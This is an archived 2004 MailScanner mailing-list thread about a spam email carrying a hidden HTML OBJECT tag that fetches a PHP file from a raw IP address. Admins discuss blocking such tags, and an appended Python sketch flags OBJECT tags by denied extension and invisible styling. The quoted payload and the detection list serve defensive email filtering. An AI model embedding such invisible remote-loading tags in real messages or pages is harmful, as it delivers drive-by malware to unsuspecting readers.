Dangerous html tag?

Remco Barendse mailscanner at BARENDSE.TO
Thu Mar 18 12:02:03 GMT 2004


I haven't got a clue whether Object Tags are ever used for something
legit.

Could you make the Object Codebase look at the allowed / disallowed
extension list? Any file we do not allow as an attachment form should be
utterly destroyed when in Object Codebase?

This would allow mails with images and other stuff we may allow but not
objectionable content.

Just an idea :)

On Thu, 18 Mar 2004, Julian Field wrote:

> I now block all Object Data tags as well as Object Codebase.
> Whether I want to block all Object tags is up for discussion.
> Your thoughts please?
>
> At 08:43 18/03/2004, you wrote:
> >I have this in MailScanner.conf:
> >
> >Allow Object Codebase Tags = no
> >Convert Dangerous HTML To Text = yes
> >
> >Should this have killed that tag, if so it didn't!
> >
> >Maybe it's a good idea to block every tag with:
> >OBJECT STYLE="display:none" DATA="
> >it will not show anything anyway therefore can only be malicious?
> >
> >
> >On Thu, 18 Mar 2004, Michele Neylon :: Blacknight Solutions wrote:
> >
> > > You could block the OBJECT tag
> > >
> > > Mr. Michele Neylon
> > > Blacknight Internet Solutions Ltd
> > > http://www.blacknightsolutions.ie/
> > > http://www.search.ie/
> > > Tel. + 353 (0)59 9137101
> > > Lowest price domains in Ireland
> > >
> > > > -----Original Message-----
> > > > From: MailScanner mailing list [mailto:MAILSCANNER at JISCMAIL.AC.UK]On
> > > > Behalf Of Remco Barendse
> > > > Sent: 18 March 2004 08:04
> > > > To: MAILSCANNER at JISCMAIL.AC.UK
> > > > Subject: [MAILSCANNER] Dangerous html tag?
> > > >
> > > >
> > > > Hi!
> > > >
> > > > I just received a message that contained ActiveX controls, nothing would
> > > > show up in Outlook.
> > > >
> > > > I opened the mail and tried to look inside, this is the contents: (I would
> > > > *NOT* try the url below on any windows/X browser)
> > > >
> > > > <html><body>
> > > > <font  face="System">
> > > > <OBJECT STYLE="display:none" DATA="http://68.6.144.228:81/185869.php">
> > > > </OBJECT></body></html>
> > > >
> > > > I tried opening the .php file to see what it is (although I have a pretty
> > > > good guess) but it failed because my firewall blocked port 81.
> > > >
> > > > Can we ban/kill/modify any such tags or will this ruin every e-mail with
> > > > some pictures in it?
> > > >
> > > > Thanks!
> > > > Remco
> > > >
> > >
> > >
> > > --
> > > Email scanned by Blacknight for viruses and dangerous content.
> > > Visit http://www.blacknight.ie for more information
> > >
>
> --
> Julian Field
> www.MailScanner.info
> MailScanner thanks transtec Computers for their support
>
> PGP footprint: EE81 D763 3DB0 0BFD E1DC 7222 11F6 5947 1415 B654
>
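
The extension check suggested at the top of this message, sketched as an added example; it is not part of the original posts and not MailScanner's own code. The deny list, the function and class names, and the sample message are all constructed for illustration, and the check also flags the invisible-OBJECT pattern raised in the thread.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import posixpath
import re

# Assumption: constructed deny list standing in for a site's disallowed
# attachment extensions; it is not read from any MailScanner file.
DENIED_EXTENSIONS = {".exe", ".scr", ".pif", ".php", ".cab", ".hta"}
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

# Constructed sample body; host and file name are placeholders.
SAMPLE = ('<html><body><OBJECT STYLE="display:none" '
          'DATA="http://mail.example.invalid:81/12345.php"></OBJECT>'
          '</body></html>')


class ObjectTagAuditor(HTMLParser):
    """Record a verdict for every <object> tag in an HTML body."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "object":  # HTMLParser lower-cases tag and attribute names
            return
        attr = {k: (v or "") for k, v in attrs}
        reasons = []
        for name in ("codebase", "data"):
            url = attr.get(name, "").strip()
            if not url:
                continue
            # Judge the URL path only, so "?x=1" or "#version=..." cannot
            # hide the extension from the comparison.
            ext = posixpath.splitext(urlparse(url).path)[1].lower()
            if ext in DENIED_EXTENSIONS:
                reasons.append(f"{name} has denied extension {ext}")
        if HIDDEN_STYLE.search(attr.get("style", "")):
            reasons.append("object is styled invisible")
        self.findings.append(("block" if reasons else "allow", reasons))


def audit_html(html):
    """Return a list of (verdict, reasons) tuples, one per <object> tag."""
    auditor = ObjectTagAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings
```

The extension in a URL says nothing about what the remote server actually returns, so this is a policy filter on the tag, not a check of the fetched content.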


